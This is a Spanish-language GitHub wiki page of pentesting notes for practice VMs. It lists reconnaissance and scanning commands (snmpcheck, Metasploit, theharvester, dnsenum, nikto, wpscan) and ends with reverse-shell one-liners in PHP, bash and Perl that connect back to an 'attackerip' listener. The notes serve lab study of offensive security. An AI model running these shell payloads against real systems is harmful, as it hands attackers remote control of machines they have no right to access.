danielcastropalomares edited this page Dec 5, 2018 · 34 revisions

Pentesting

En este apartado se detallara el procedimiento aplicado para realizar el pentesting en cada VM:

Level easy

Level easy - Intermediate

Utilidades

tips and tricks

Crear wordlists de passwords

kernelpop

Multi Tool vulneraty

NMAP

snmpcheck

Muestras la información obtenida por SNMP de forma amigable

snmpcheck -t x.x.x.x

msfconsole

Primero tendremos que iniciar la BBD postgresql:

/etc/init.d/postgresql start

Ahora ya podemos entrar dentro de la consola:

msfconsole

Para buscar y utilizar un exploit:

search TEST

exploit TEST

Si queremos saber que variables podemos utilizar en el exploit:

info

SET RHOST x.x.x.x

theharvester

Obtener información de un dominio desde diferentes motores de búsqueda:

theharvester -d test.com -l 200 -b google

DNSenum

Mostrar toda la información posible de un dominio:

dnsenum --enum test.com

Nikto

Vulnerabilidades web

nikto -C all -host x.x.x.x

Wordpress scaner

wpscan –url http://IP/ –enumerate p

Reverse shell

Maquina atacante:

nc -vlp 8080

Maquina victima

php -r '$sock=fsockopen("attackerip",8080);exec("/bin/sh -i <&3 >&3 2>&3");'`
bash -i >& /dev/tcp/attackerip/8080 0>&1`
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Una vez obtenida la shell:

python -c 'import pty;pty.spawn("/bin/bash")'
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.